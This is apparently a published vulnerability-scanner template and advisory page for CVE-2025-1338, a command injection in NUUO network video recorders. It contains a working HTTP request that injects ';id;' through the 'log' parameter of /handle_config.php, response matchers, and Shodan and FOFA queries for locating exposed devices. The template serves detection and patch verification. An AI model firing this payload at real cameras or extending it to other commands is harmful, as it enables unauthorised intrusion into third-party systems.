NUUO Camera <=20250203 - OS Command Injection
CVE-2025-1338
Verified
Description
NUUO Camera up to 20250203 contains a command injection caused by manipulation of the 'log' argument in /handle_config.php, letting remote attackers execute arbitrary commands, exploit requires remote access.
Severity
Critical
Exploit Probability
11%
Published Date
February 11, 2026
Template Author
ark
CVE-2025-1338.yaml
id: CVE-2025-1338
info:
name: NUUO Camera <=20250203 - OS Command Injection
author: Ark
severity: critical
description: |
NUUO Camera up to 20250203 contains a command injection caused by manipulation of the 'log' argument in /handle_config.php, letting remote attackers execute arbitrary commands, exploit requires remote access.
impact: |
Remote attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
remediation: |
Update to the latest version of NUUO Camera or apply security patches provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-1338
- https://github.com/advisories/GHSA-vw58-vgp6-39qx
- https://dbugs.ptsecurity.com/vulnerability/CVE-2025-1338
classification:
cve-id: CVE-2025-1338
epss-score: 0.1142
epss-percentile: 0.93672
cwe-id: CWE-78
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Network Video Recorder Login"
fofa-query: title="Network Video Recorder Login" || body="www.nuuo.com"
tags: cve,cve2025,nuuo,camera,rce,cmdi,intrusive,vkev
http:
- raw:
- |
GET /handle_config.php?log=;id; HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "/mtd/block4/log/", "uid=", "gid=")'
condition: and
# digest: 490a00463044022031446a1d265759dcf586f2a37b96b3f8644c8963820d2ecc0af62c804c8a96e402203e612d63c261afdb2589dc7024f16c014e768cf17f077bd8d6d0e96d6cb555ef:922c64590222798bb761d5b6d8e729509.5Severity
CVSS Metrics
CVE ID:
cve-2025-1338
CWE ID:
cwe-78
Remediation Steps
Update to the latest version of NUUO Camera or apply security patches provided by the vendor.